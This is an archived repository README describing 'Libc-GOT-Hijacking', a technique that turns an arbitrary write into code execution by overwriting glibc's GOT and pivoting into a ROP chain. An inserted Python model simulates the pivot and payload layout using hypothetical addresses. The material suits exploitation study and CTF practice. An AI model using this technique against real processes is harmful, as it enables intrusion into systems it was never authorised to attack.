• This repository has been archived on 15/Jun/2024

Repository Details

Binary Exploitation Skill. Gain RCE from arbitrary write.

Libc-GOT-Hijacking

Transform arbitrary write to RCE.

This is a userspace attack technique: if you can write to arbitrary memory, you can use this method to execute arbitrary code.

You only need to know the base address of glibc.

glibc > 2.35

Compared to glibc <= 2.35, newer versions implement a mitigation that forbids the method used for the old library. However, we designed a method to bypass it and execute arbitrary code with a single arbitrary write to glibc's GOT table. This method performs a Return Oriented Programming (ROP) attack on the Global Offset Table (GOT).

Attack flow (diagram)

You can find details, templates, demos, and everything you want in: Details and Templates

glibc <= 2.35

I learned the original method from Sammy Hajhamid; the methods for glibc <= 2.35 are also inspired by his work.

Based on his work, we designed a method to execute arbitrary code with a single arbitrary write to glibc's GOT table. The method uses PLT_0 to push libc_exe_address onto the stack and then a POP RSP; RET gadget to pivot into our ROP chain.

You can find details, templates, demos, and everything you want in: Details and Templates
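To make the pivot described above concrete, here is an added model of the control flow, written for this page and not taken from the project's own templates. It relies on two real facts: the x86-64 PLT[0] stub does `push GOT[1]; jmp *GOT[2]` (normally the link_map pointer and `_dl_runtime_resolve`), and a `pop rsp; ret` gadget moves the stack to whatever was just pushed. The addresses, GOT offset and gadget locations are constructed and hypothetical, the "gadgets" only record that they ran, and the model ignores that the chain written from GOT[3] onward clobbers real function-pointer slots, which the real templates have to account for. It also assumes a lazily bound libc-internal PLT call still reaches PLT[0] after the write, which is exactly what the glibc > 2.35 mitigation changes.

```python
import struct

WORD = 8
MASK = (1 << 64) - 1

# Constructed, hypothetical addresses; nothing here is taken from a real libc.
LIBC_BASE   = 0x7f1234000000
GOT         = LIBC_BASE + 0x219000      # libc's own .got.plt (hypothetical offset)
PLT0        = LIBC_BASE + 0x028000      # PLT[0] stub (hypothetical offset)
POP_RSP_RET = LIBC_BASE + 0x0004d1      # "pop rsp ; ret" gadget (hypothetical)
GADGET_A    = LIBC_BASE + 0x0015e2      # stand-ins for the chain's gadgets
GADGET_B    = LIBC_BASE + 0x0027a3
TARGET      = LIBC_BASE + 0x050d70      # where the chain finally lands, e.g. system()
STACK_TOP   = 0x7ffc00010000

class Cpu:
    """Minimal x86-64 model: word-addressed memory, rsp/rip and an execution trace."""
    def __init__(self):
        self.mem = {}          # addr -> 64-bit word
        self.rsp = STACK_TOP
        self.rip = 0
        self.trace = []

    def read(self, addr):
        return self.mem.get(addr, 0)

    def write(self, addr, value):
        self.mem[addr] = value & MASK

    def push(self, value):
        self.rsp -= WORD
        self.write(self.rsp, value)

    def pop(self):
        value = self.read(self.rsp)
        self.rsp += WORD
        return value

def plt0(cpu):
    """x86-64 PLT[0]: push GOT[1] (link_map); jmp *GOT[2] (_dl_runtime_resolve)."""
    cpu.push(cpu.read(GOT + 1 * WORD))
    cpu.rip = cpu.read(GOT + 2 * WORD)

def pop_rsp_ret(cpu):
    """The pivot gadget: the word PLT[0] just pushed becomes rsp, then ret."""
    cpu.rsp = cpu.pop()
    cpu.rip = cpu.pop()      # first word of the chain

def marker(name, stop=False):
    """Stand-in for a ROP gadget: record that it ran, then 'ret' to the next word."""
    def gadget(cpu):
        cpu.trace.append(name)
        cpu.rip = 0 if stop else cpu.pop()
    return gadget

CODE = {
    PLT0: plt0,
    POP_RSP_RET: pop_rsp_ret,
    GADGET_A: marker("gadget_a"),
    GADGET_B: marker("gadget_b"),
    TARGET: marker("target", stop=True),
}

def build_got_write(got, pivot, chain):
    """One contiguous write: GOT[1] = &chain, GOT[2] = pivot gadget, chain from GOT[3] on.
    Returns (address, bytes) for the attacker's single arbitrary write."""
    words = [got + 3 * WORD, pivot] + list(chain)
    return got + WORD, b"".join(struct.pack("<Q", w) for w in words)

def apply_write(cpu, addr, data):
    """Model the arbitrary write; data must be whole little-endian words."""
    assert len(data) % WORD == 0
    for i in range(0, len(data), WORD):
        cpu.write(addr + i, struct.unpack("<Q", data[i:i + WORD])[0])

def lazy_plt_call(cpu, reloc_index, return_addr):
    """An unresolved PLT[n] call: the stub pushes the reloc index and jumps to PLT[0]."""
    cpu.push(return_addr)
    cpu.push(reloc_index)
    cpu.rip = PLT0

def run(cpu, max_steps=100):
    """Execute until rip leaves the modelled code (or the step budget runs out)."""
    steps = 0
    while cpu.rip in CODE and steps < max_steps:
        CODE[cpu.rip](cpu)
        steps += 1
    return cpu.trace

def demo():
    cpu = Cpu()
    # Pristine GOT[1]/GOT[2] as the loader would have set them (hypothetical values).
    cpu.write(GOT + 1 * WORD, 0x7f1234567000)  # link_map
    cpu.write(GOT + 2 * WORD, 0x7f1233000000)  # _dl_runtime_resolve
    # One arbitrary write on libc's GOT; afterwards any lazily bound PLT call pivots.
    addr, data = build_got_write(GOT, POP_RSP_RET, [GADGET_A, GADGET_B, TARGET])
    apply_write(cpu, addr, data)
    lazy_plt_call(cpu, reloc_index=7, return_addr=LIBC_BASE + 0x90000)
    return run(cpu)

if __name__ == "__main__":
    print(demo())
```

`demo()` returns the order in which the stand-in gadgets ran: the pushed GOT[1] becomes rsp, so `ret` consumes the chain starting at GOT[3]. The same layout is why a real template only needs the libc base: every value in the write is base plus a fixed offset.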

Acknowledgments

  • Great job @swing on the impressive work with glibc >2.35!

  • Appreciate the original work done by @pepsipu.

Reference link

Todo

  • Provide the one_gadget version
    • Only modify 0x10 bytes (gadget1 + one_gadget)
  • Fix it for latest glibc